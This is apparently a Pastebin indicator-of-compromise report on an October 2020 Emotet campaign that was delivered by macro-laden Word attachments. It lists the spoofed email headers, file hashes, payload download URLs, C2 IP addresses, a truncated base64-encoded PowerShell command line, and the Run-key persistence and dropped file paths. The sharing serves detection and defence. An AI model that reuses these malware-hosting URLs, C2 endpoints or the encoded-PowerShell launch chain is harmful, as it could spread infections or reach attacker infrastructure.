Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
- https://pastebin.com/cNb8XhX1
- previous_contact:
- https://pastebin.com/1XfkVE5e
- https://pastebin.com/F520pqQW
- FAQ:
- attack_vector
- --------------
- email attach .doc > macro > WMI > powershell -enc > GET 8! URL > \Users\%name%\*.exe > C:\Users\%name%\AppData\Local\*\*.exe
- email_headers
- --------------
- Received: from ns.shimizuya.co.jp (ns.shimizuya.co.jp [210.143.104.170])
- Received: from [197.221.251.9] (unknown [197.221.251.9])
- by ns.shimizuya.co.jp (Postfix) with ESMTPA id 13DFA63586
- Date: Thu, 22 Oct 2020 14:40:57 +0200
- From: "spoofed_email" <kikaku-toyopridea@shimizuya.co.jp>
- To: victim@org.com
- Subject: FW: Надсилання: 1_16_41124-20(09.10.20), Концепція розвитку, Пояснювальна записка, Розпорядження(проект)
- files
- --------------
- SHA-256 4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80
- File name PO6556850371IW.doc
- File size 178.00 KB (182272 bytes)
- SHA-256 125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11
- File name RMActivate_isv.exe
- File size 368.00 KB (376832 bytes)
- activity
- **************
- PL_SCR
- http://launch.tactikafacewear.com/wp-content/Uk
- paasologrp.com/parseopmlo/5
- singohotel.com/dashboardl/Pq
- mymathlabhomework.com/wp-content/Po
- https://dietherbsindia.com/assets/k8oo
- dev-tech.eu/demoshop/P0
- mithraa.co/nMT
- chess-pgn.com/win-raid/Pl6T5
- C2
- 200.116.145.225:443
- 5.196.108.185:8080
- 167.114.153.111:8080
- netwrk
- --------------
- launch.tactikafacewear.com GET /wp-content/Uk/ HTTP/1.1
- 200.116.145.225:443 POST /hCnHn8M/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- 5.196.108.185:8080 POST /rWnUmnc/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- 167.114.153.111:8080 POST /dQok/1r/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- 167.99.105.11:8080 POST /i8Elp07/... HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0
- comp
- --------------
- powershell.exe 170.10.164.154 443
- powershell.exe 3.10.134.94 80
- RMActivate_isv.exe 200.116.145.225 443
- RMActivate_isv.exe 5.196.108.185 8080
- RMActivate_isv.exe 167.114.153.111 8080
- RMActivate_isv.exe 212.42.75.240 993
- RMActivate_isv.exe 167.99.105.11 8080
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- [another]
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe -ENCOD IAAkAGoAQwBGAFYAUABiACAAIAA9AFsAVABZAFAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADUAf
- C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe - moved
- C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22.10.2020 15:45
- RMActivate_isv EffectDemo MFC Application
- c:\users\operator\appdata\local\appmgr\rmactivate_isv.exe 23.10.2020 1:28
- drop
- --------------
- C:\Users\operator\Qyj9bw1\A5vuovn\Rcrtkr.exe
- C:\Users\operator\AppData\Local\appmgr\RMActivate_isv.exe
- # # #
- https://www.virustotal.com/gui/file/4008f8c88281fb6c543244f1701fb930aa6d1411a3209fcaa2997ee26f977d80/details
- https://www.virustotal.com/gui/file/125411ad0784ac4750a1205b97e6a20c905baf5c117a27c4b417590494d80b11/details
- https://analyze.intezer.com/analyses/10b857fe-3d77-4c66-a92b-46fb82549676
- VR
Add Comment
Please, Sign In to add comment